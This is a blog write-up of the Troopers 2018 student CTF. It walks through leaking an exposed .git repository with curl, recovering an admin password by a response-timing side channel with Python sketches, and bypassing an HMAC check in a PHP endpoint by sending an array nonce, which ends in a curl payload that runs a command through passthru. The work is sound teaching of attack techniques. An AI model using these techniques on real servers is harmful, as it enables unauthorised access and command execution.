Troopers FUCSS CTF 2018 Writeup

On the first of October 2018, the TROOPERS Conference tweeted this.

In short, TROOPERS generously gives away a couple of free tickets to students who submit a motivational letter.

This year however, they added an additional technical challenge which features two missions.

Since I'd LOVE to go, I decided to polish my motivational letter with this writeup.

# Table of contents

# How I solved the challenges

# 1. Access Denied

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well. Since said entity is rather sloppy with their access controls we found an internet facing web interface. Go over to db.f•••••• and see if you can gain access to the application.

# Reconnaissance

Let's have a look, open the target site.

*(Screenshot: the FUCSS index page)*

Alright, nothing much to see from the outside.
A very useful thing to check for is the so-called robots.txt. This is a convenient standard for telling web robots where to look and where not to.

Not all robots cooperate with the standard; email harvesters, spambots, malware, and robots that scan for security vulnerabilities may even start with the portions of the website where they have been told to stay out. 

Source: Wikipedia, as of 2018-10-05

For this we just append /robots.txt to the url. 

User-agent: *
Allow: /humans.txt
Disallow: /

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

Something we can work with, nice. 

While this is the "Robots exclusion standard", there's also an "inclusion standard" called Sitemaps. Those provide web robots with information on where to look for content. Earlier we saw that the robots.txt specifically disallows everything except for the /humans.txt; nonetheless, it's always worth looking at the Sitemap.

*(Screenshot: the Sitemap request returns a 404)*


So let's take a look at the /humans.txt, the authors maybe dropped a hint there:

this NONSENSE is brought to you by
@hnzlmnn and @talynrae

Well. Maybe a hint, maybe not. /shrug

(either way, give 'em a nice tweet for creating these awesome challenges, will ya?)

Alright, before we continue with the disallowed sites from the robots.txt, let's investigate the root page first.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta content="IE=edge" http-equiv="X-UA-Compatible" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <title>FishBowl 0day Database</title>
    <link rel="stylesheet" href="/static/css/main.css" />
  </head>
  <body class="">
    <div class="grid-wrap main-content">
      <section class="page">
        <div class="page-content">
          <div id="maintenance">
            Maintenance mode has been activated.<br />
            Use the administrative interface to disable it.
          </div>
        </div>
      </section>
    </div>
    <div class="grid-wrap">
      <header class="site-footer">
        <div class="wrapper">
          <a class="logo" href="/">
            <img alt="LOGO" src="/static/images/logo.svg" />
          </a>
        </div>
      </header>
    </div>
  </body>
</html>

Very concise, no comments that could help us, no JavaScript either. The only external thing is the CSS file. I won't post it here since it isn't as short as the HTML, but at first glance it doesn't hold any interesting information either - except for these two parts:

#registration-form {
  font-family: "Source Sans Pro", "Helvetica Neue", "Helvetica", sans-serif;
  width: 400px;
  min-width: 250px;
  margin: 20px auto;
  position: relative;
  border-radius: 2px;
  overflow: hidden;
}
#registration-form:after {
  /* ... */
}

Alright, it seems there is/was a login form somewhere. That doesn't help us right now, though there could have been something useful here. Secondly, there is this:

body.error {
  background-image: url("/static/images/children-593313.jpg");
}

body.noaccess {
  background-image: url("/static/images/chain-690088.jpg");
}

body.notfound {
  background-image: url("/static/images/adult-art-black-and-white-368855.jpg");
}

body.badrequest {
  background-image: url("/static/images/badrequest.jpg");
}

This info tells us more about the folder structure of the site. Maybe they misconfigured their server and allow directory listing?

*(Screenshot: 403 Forbidden)*

Was worth a try, I guess. The 404 Page doesn't hold anything of value either.

Now we've exhausted the useful information on the initial pages, but remember this:

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

What's interesting here is the user agent, Evil Imp/3.7, that gets mentioned in the beginning. 


Websites can use this information to serve you different types of content. As a quick example, when your user agent indicates an older browser, sites might try to increase backwards compatibility by using older syntax in their HTML, JavaScript or CSS.

With this in mind, let's open the disallowed links normally. 

/api leads us to

*(Screenshot: /api demanding authentication)*

/admin redirects us to /login, which looks like this:

*(Screenshot: the login form)*

An interesting detail you'll notice when you type something in is the following:

*(Screenshot: the login form rejecting input that doesn't match the expected format)*

Sites can request a specific format for input fields via the pattern attribute which, in our case, looks like this:

<input data-error-message="Password required" pattern=".{32}" type="password" ... />

In the pattern .{32}, the dot . is a wildcard, meaning any character fits, be it a letter, digit or special character. This tells the browser to automatically block passwords that are not exactly 32 characters long. You could, in theory, manually submit passwords that don't fit the pattern, sure. I'll take an educated guess here though and say that this is probably not the intended solution.
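As a side note, an HTML pattern regex is matched against the entire input value, so .{32} really does mean "exactly 32 characters". A quick Python sketch of the equivalent check (re.fullmatch mirrors the browser's implicit anchoring; the function name is my own):

```python
import re

# The pattern from the login form: exactly 32 arbitrary characters.
PASSWORD_PATTERN = r".{32}"

def browser_would_accept(value: str) -> bool:
    """Mimic the HTML pattern check: the regex must match the whole value."""
    return re.fullmatch(PASSWORD_PATTERN, value) is not None
```

In other words, any brute force only needs to consider 32-character candidates.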

# Time to become Evil

What do those sites look like when we use the aforementioned user agent of Evil Imp/3.7?

In Chrome/Chromium you can change your user agent by opening the Developer Tools (press F12) and switching to the Network Tab. In the three-dot-menu you can find the Network conditions option.

*(Screenshot: the Network conditions panel)*

This'll let you specify your user agent like so:

*(Screenshot: setting a custom user agent)*

Back to checking out the site.

The index page /, /api, /admin and /login all return

*(Screenshot: the "git gud" hint page)*

Finally! Our first little 'win', as in, our first proper clue!

.git here refers to the popular version control software Git.

To summarise quickly for those not familiar with the technology: Git helps people and robots keep track of changes to files. It stores information about when each file was changed, what was changed, by whom and for what reason.

Figuratively speaking, this information makes attackers salivate.

# Investigate /.git/

Since every page now returns the beautiful Rainbow-Imp-Animation, it's time to remove our custom user agent from earlier.

Problem is that we get greeted by 

*(Screenshot: 403 Forbidden)*

when we try to access /.git/, because directory listing is disabled (remember earlier).

So what happens if we don't try to list the directory and instead target a specific file inside the folder? Since Git got mentioned, we can simply look up its internal file structure in the documentation or the man page (gitrepository-layout).


   [...] a valid Git repository must have the HEAD file; [...]

Source: the gitrepository-layout man page, as of 2018-10-05

So let's simply fetch the /.git/HEAD file via cURL:

ref: refs/heads/master


Non-directory files don't seem to be forbidden!

Remember that Git can also track why changes were made. One can describe their changes in the so-called commit message; the most recent one is stored in the COMMIT_EDITMSG file.


Making your code involuntarily publicly accessible can be a big whoopsie, yeah.
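Since the directory listing is blocked but individual files are not, the idea is simply to probe the well-known file names from the gitrepository-layout man page one by one. A hedged Python sketch of that probing (the base URL is a placeholder for the redacted host, and I'm using the standard library's urllib here):

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Files that exist in virtually every Git repository (see gitrepository-layout).
GIT_FILES = ["HEAD", "config", "COMMIT_EDITMSG", "refs/heads/master"]

def git_probe_urls(base_url):
    """Build the candidate URLs for the well-known Git files."""
    return [urljoin(base_url, ".git/" + name) for name in GIT_FILES]

def probe(url):
    """Return the HTTP status code for one URL; 200 means the file is readable."""
    try:
        with urllib.request.urlopen(url) as response:
            return response.getcode()
    except urllib.error.HTTPError as err:
        return err.code
```

Any path that comes back 200 instead of 403 is a piece of the repository we can download.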

# Attack

By getting the individual pieces of the repository we could rebuild it locally and hopefully look up how the authentication at /login works.

So let's create a local repository and fill it with the data from the site.

mkdir repo && cd repo && git init
Initialized empty Git repository in /tmp/repo/.git/

Reading the HEAD file told us that the currently active branch is called 'master'. This in turn lets us look up that branch's tip commit hash, stored under /.git/refs/heads/master, which yields 9a932cc71e599ab95e588820d1dfeca8cc63313a.


Now that we know the hash, let's try to get the corresponding object and pretty-print it:

mkdir .git/objects/9a
curl > .git/objects/9a/932cc71e599ab95e588820d1dfeca8cc63313a
git cat-file -p HEAD 
tree 87b769291b90999ec479f93f375cc13f3ed71a08
parent 4388a30f98f830b0baef344d631236feaacfb26f
author devops <> 1525277577 +0200
committer devops <> 1538218054 +0200


There we see the "Whooooopsie" again! We could even write a friendly E-Mail to the commit author. :-)

More important are the tree and parent hashes: those allow us to find more files and commit messages. Let's get the parent.

mkdir .git/objects/43
curl > .git/objects/43/88a30f98f830b0baef344d631236feaacfb26f
git cat-file -p 4388a30
tree a66997e5f94a288b92c1c53a342ba95cee37edad
author devops <> 1518597252 +0100
committer devops <> 1538218054 +0200

Initial Commit

Hey, this one has no parent! Let's proceed with the first tree then

mkdir .git/objects/87
curl > .git/objects/87/b769291b90999ec479f93f375cc13f3ed71a08
git cat-file -p 87b7692 
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt

Here we can see that a readme.txt is stored in that tree. Grab it!

mkdir .git/objects/d5
curl > .git/objects/d5/d0d15ef3c8fe414808223edee33f37fd52134e
git cat-file -p d5d0d15

Migrate codebase into version control system

Nothing interesting in the readme.txt. Next tree.

mkdir .git/objects/a6
curl > .git/objects/a6/6997e5f94a288b92c1c53a342ba95cee37edad
git cat-file -p a66997e
100644 blob d5d0d15ef3c8fe414808223edee33f37fd52134e    readme.txt
100644 blob 9102077ff36290750e5af1551c7a9bad090ec59b    secret.txt

Aaaah, secret.txt sounds interesting.

mkdir .git/objects/91
curl > .git/objects/91/02077ff36290750e5af1551c7a9bad090ec59b
git cat-file -p 9102077
[REST in Pieces]
[Access Denied]
    it's definitely NOT SQLi
    Take your TIME


I guess the hint that it's "NOT" SQL injection is nice to have...

I want to be honest here: I was pretty disappointed when reading the secret.txt and spent a whole hour trying to come up with a new approach.

With nothing left to see inside the /.git/ folder, I just dabbled with the /login page for a while which looked like this:

*(Screenshot: login error saying the username is invalid)*

I was wondering why it specifically says that the username is invalid instead of something more generic. So naturally I tried to provoke a different error message by trying out usernames like:

  • 'root',
  • 'Fishbowl',
  • 'Evil Imp/3.7'

and last but not least:

  • 'admin'.

*(Screenshot: login error "Username or password wrong")*

Another puzzle piece found! 

What I haven't specifically mentioned so far is that I monitored the response headers of my login attempts to get a better understanding of the whole login process. This luckily resulted in me noticing a curious new response from the server!

Normally the server responds, amongst other things, with these:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

After trying with the 'admin' user, suddenly this new header sneaked in:

X-Content-Type-Options: nosniff
X-DBQuery-Perf: 6ms
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Remember the challenge description?

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well.

Database Query Performance? 'Take your TIME'?

*(Image: hangover calculations)*

Oh my, a Timing Attack!?

By measuring the time it takes the server to process our request, we can infer how close our guess is to being correct!

Let's say we have a server that validates a passphrase. Said server goes from left to right and needs 1 second per character.

Comparing  'ABCD' and 'ABXD':

*(Diagram: variable-time string comparison)*

(I made this graphic myself, do you like it? Let me know!)

Notice how we didn't compare the two 'D' characters? As soon as we see a non-matching character, we stop the comparison. This is problematic.

This allows attackers to estimate the correctness of the provided passphrase by measuring the time. The longer the comparison takes, the better!

This example is pretty drastic because comparing a single character almost never takes a whole second, but don't dismiss this attack. It is a real attack vector which you should look out for; see this paper from the Black Hat conference in 2015 by Timothy D. Morgan and Jason W. Morgan.
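To make the early exit concrete, here is a tiny Python model of such a flawed comparison (my own illustration, not the challenge's actual server code). It also returns how many characters were inspected, which is exactly the quantity that leaks through the response time:

```python
def naive_equals(expected, guess):
    """Compare left to right and stop at the first mismatch.

    Returns (equal, comparisons) so the timing leak becomes visible:
    the more leading characters match, the more comparisons happen.
    """
    comparisons = 0
    for a, b in zip(expected, guess):
        comparisons += 1
        if a != b:
            return False, comparisons
    return len(expected) == len(guess), comparisons
```

Comparing 'ABCD' with 'ABXD' inspects only three characters, while 'ABCD' with 'ABCD' inspects all four; at one second per comparison, that is the one-second gap in the graphic above.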

So let's put this theory to the test by doing a couple of requests per character and averaging them afterwards. (I chose to do this in Python with the requests library, more on the specifics later.)
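The measurement itself is conceptually simple. Below is a hedged sketch of the approach; the login URL and form field names are assumptions, and I use the standard library's urllib here where my actual script used the requests library:

```python
import time
import urllib.error
import urllib.parse
import urllib.request

def time_login_attempt(base_url, password):
    """Time one login attempt in seconds; error responses still get timed."""
    data = urllib.parse.urlencode({"username": "admin", "password": password}).encode()
    start = time.perf_counter()
    try:
        urllib.request.urlopen(base_url + "/login", data=data)
    except urllib.error.HTTPError:
        pass  # a 401 is expected; we only care about the elapsed time
    return time.perf_counter() - start

def best_candidate(timings):
    """Given {char: [seconds, ...]}, return the char with the highest average."""
    return max(timings, key=lambda ch: sum(timings[ch]) / len(timings[ch]))
```

Each printable character gets timed several times, and the candidate whose average response time sticks out is (probably) the correct one.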

*(Chart: average response times for each first-character candidate; 'S' stands out)*

Now if that is not suspicious, I don't know what is. Let's try using the found 'S' and appending a second character.

*(Chart: average response times for the second character with prefix 'S'; '0' stands out)*

It seems like the first character 'S' might be correct, every single response took at least 200ms. It also seems like the second character is '0' (zero).

With these findings, it looks like a correct character adds approximately 200ms response time. If we look for the third character, our worst case time complexity amounts to roughly

400ms per character
* 99 printable ascii characters
+ 600ms for the found character
= 40200ms * n-retries
= 40.2 seconds * n-retries

This is starting to look pretty uncomfortable, especially if you keep in mind that this is only the third character out of 32.

Adding the sequential tries amounts to a worst case of +165 minutes with 1 request per character.

This doesn't sound impossible, but uncomfortable nonetheless. We could speed it up by making multiple requests simultaneously, but first let's try to deepen our knowledge of how the comparison works.

What happens if the first character is wrong while the second character is correct? 

*(Chart: response times for the second character alone, without the correct first character)*

NICE. This means we don't have to include previously found characters, which drastically reduces the worst case time complexity. Optimistically this results in:

20ms per character
* 99 printable ascii characters
+ 200ms for the found character
= 2.18s per position
* 32 positions
= 1.16min * n-retries

Only about a minute! That's over a 99% time improvement compared with the naive brute force from before.

Here is my timing attack in action. (video is sped up)

Logging in with 'admin' and our newly found password, we finally reach our goal.


Code used for the timing attack can be found here.

This concludes the first challenge. Take a breather, this has been quite the extensive writeup.

If you enjoyed this you might enjoy my other article about learning binary code interactively.

Anyways, on to the next challenge:

# 2. REST in Pieces

Our insider intern discovered an unauthenticated API endpoint within the database appliance. Along with this information we were able to exfiltrate a code snippet of this endpoint. You can find it on or pastebin. Locate and examine the endpoint.

This challenge is a little different. Here we are provided with the following code snippet (you don't have to study it completely yet, I'll go over it - step by step):


/**
 * rest.php
 * Remote Execution Service Tomato™
 *
 * @category   REST
 * @package    Fishbowl 0day DB
 * @author     @hnzlmnn <>
 * @endpoint   /api/vegan/rest
 * @license    MIT
 * @version    1.0
 */


$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	// error: 400
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
	// error: 400
}

if (!empty($command['nonce'])) {
	$secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
	// error: 401
}

passthru($command['action']);


# Reconnaissance

First of all, let's check out the mentioned API endpoint and see what we're dealing with.

*(Screenshot: GET response from /api/vegan/rest)*

Judging from the code I guess this is supposed to resemble a tomato. Let's send another request.

*(Screenshot: a second GET response with a different tomato fact)*

Oh, you get different facts about the tomato. Neat.

Inside the response headers we see a juicy status code

Request URL:
Request Method: GET
Status Code: 400 Tomato

Which makes sense if we go through the source. 

$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
	// error: 400
}

If we do not provide an action, we error out with a 400 status code. To verify that we indeed have the proper file, I'd suggest trying to reach the 401 status code. 

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {

For this, we need to check where all the variables, i.e. algo, action, secret and hash, are being set.

$secret = getenv('secret');
$command = array(
	'algo' => "sha256",
	'nonce' => $_POST['nonce'],
	'hash' => $_POST['hash'],
	'action' => base64_decode($_POST['action'])
);

algo and $secret are already set for us. Next down the line is hash, which we can blindly set via hash=a; only action needs a little attention. We have to provide a base64-encoded string. Let's encode 'a' for exemplary purposes.

printf a | base64
YQ==

Now we can make a request that should result in a 401 Error.

curl -X POST -i -d 'action=YQ==&hash=a'
HTTP/1.1 401 Tomato
# ...

Works like it's supposed to!

# Planning the attack

Since we have the source code this time, we have the ability to test our exploit on our machine, offline. 

Let's copy the source and spin up a PHP Server.

cp source.php test_exploit.php
php -S

Now let's clean up the file: remove the require_once, replace its error methods with our own, and add some useful debug output.

$secret = getenv('secret');
$command = array(
        'algo' => "sha256",
        'nonce' => $_POST['nonce'],
        'hash' => $_POST['hash'],
        'action' => base64_decode($_POST['action'])
);

if (empty($command['action'])) {
        echo "1. Error 400: No 'action'!\n";
}

if (!in_array($command['algo'], hash_hmac_algos()) || empty($command['hash'])) {
        echo "2. Error 400: No 'hash'! \n";
}

if (!empty($command['nonce'])) {
        echo "You provided 'nonce': ".$command['nonce']."\n";
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
        echo "3. Error 401: hash_hmac does not match hash! \n";
        echo "  - hmac: ".hash_hmac($command['algo'], $command['action'], $secret)."\n";
        echo "  - hash: ".$command['hash']."\n";
        echo "Exiting now.\n";
        exit;
}

// passthru($command['action']);
echo "You got code execution with 'action' being: ".$command['action'];

Here is what an example request looks like now.

curl -X POST -d ""
1. Error 400: No 'action'!
2. Error 400: No 'hash'! 
3. Error 401: hash_hmac does not match hash! 
  - hmac: b613679a0814d9ec772f95d778c35fc5ff1697c493715653c6c712144292c5ad
  - hash: 
Exiting now.

With such clean feedback from ourselves, we can inch forward.

curl -X POST -d "action=YQ==&hash=a" 
3. Error 401: hash_hmac does not match hash! 
  - hmac: 9615a95d4a336118c435b9cd54c5e8644ab956b573aa2926274a1280b6674713
  - hash: a
Exiting now.

But now comes the third roadblock: we need to know what the result of hash_hmac is.

As an attacker, my mind is always looking for things that I can influence i.e. 'over what parameters do I have what control'. In this case, we already know two out of three parameters.

hash_hmac($command['algo'], $command['action'], $secret)

We know algo and action get set in the beginning:

$command = array(
        'algo' => "sha256",
        // ...
        'action' => base64_decode($_POST['action'])
);

Let's see what kind of control we have over $secret. There is a way to influence its value by providing nonce.

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

Again, same thought process. We already know what algo gets set to and $secret is being assigned here:

$secret = getenv('secret');

Sadly this doesn't give us an opportunity to influence its value, though. That leaves only nonce which gets assigned at the top.

$command = array(
        // ..
        'nonce' => $_POST['nonce'],
        // ..
);

So we control the raw value of nonce. I emphasize raw here because we are able to set not only the value of nonce, but also - more importantly - its type!

When posting information to a site, you are able to specify whether an argument is a "normal", single value or a list of values.

In the latter case, PHP is nice enough to automatically convert a list to an array!

Since PHP is a Loosely Typed language, this can sometimes lead to unexpected behaviour when you don't check the type of the variable you're working with. A very basic example that can bite you in the butt is weak comparisons of strings and numbers.

Strings starting with a number automatically get converted to integers/floats (in PHP 7's weak comparisons), see:

php > var_dump(123 == 123);
bool(true)

php > var_dump(123 == "123");
bool(true)

php > var_dump(123 == "123.0");
bool(true)

php > var_dump(123 == "123example");
bool(true)

php > var_dump(123 == "example123");
bool(false)

So that raises the question: What happens to hash_hmac when we provide an array instead of a string?

php > var_dump(hash_hmac('sha256', array(), "secret"));
PHP Warning:  hash_hmac() expects parameter 2 to be string, array given in php shell code on line 1
NULL

PHP is so kind and warns us about the type but does not error out! It just keeps running and returns NULL.

Remember, we're trying to influence the assigned value of $secret, which we now can!

if (!empty($command['nonce'])) {
        $secret = hash_hmac($command['algo'], $command['nonce'], $secret);
}

When providing a list for nonce, $secret is gonna be NULL!

This in turn, means that we now know all the parameters of the call to hash_hmac here

if (hash_hmac($command['algo'], $command['action'], $secret) !== $command['hash']) {
  1. algo has the fixed value "sha256"

  2. action = base64 decoded $_POST['action']

  3. $secret is going to be NULL because we control nonce

  4. hash we control via $_POST['hash']
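Because PHP casts the NULL'd secret to an empty string inside hash_hmac, we can reproduce the server's computation offline without ever knowing the real secret. A Python sketch of that forgery (the empty-key behaviour is the NULL effect derived above; the function name is my own):

```python
import base64
import hashlib
import hmac

def forge_params(command):
    """Build POST parameters that pass the HMAC check once nonce[] nulls the secret."""
    action = base64.b64encode(command.encode()).decode()
    # Mirrors PHP's hash_hmac('sha256', $action, NULL): NULL acts like the empty string.
    digest = hmac.new(b"", command.encode(), hashlib.sha256).hexdigest()
    return {"action": action, "hash": digest, "nonce[]": ""}
```

forge_params("id") yields action=aWQ= together with the matching hash, the same values the patched local script prints below.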

# Attack

Finally, let's calculate the values we need: action and hash

// action
php > echo base64_encode("id");
aWQ=

And for the hash we can use our PHP Server:

curl -X POST -d "action=aWQ=&hash=a&nonce[]="
You provided 'nonce': Array
3. Error 401: hash_hmac does not match hash! 
  - hmac: 34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909
  - hash: a
Exiting now.

Now we have all the information needed to construct our real payload.

curl -X POST -d "action=aWQ=&hash=34ce0b031abf5f1f67ab9dfdae781582fdec327df7838c70fcefa9a68e49b909&nonce[]="

And there you have it! A flag!

# Closing words

I genuinely enjoyed solving the challenges and creating this writeup. If I could get an invite to the TROOPERS Conference, that would mean the world to me. When I solved the challenges I felt so giddy with excitement; here's my original tweet from back in October.

Please make it happen TROOPERS Team. <3

Thank you all for reading, really do appreciate it.

# Update 2018-12-18

I got invited to TROOPERS!! <3

Thank you so much.

What did you like about this post? Got questions? Get in touch!
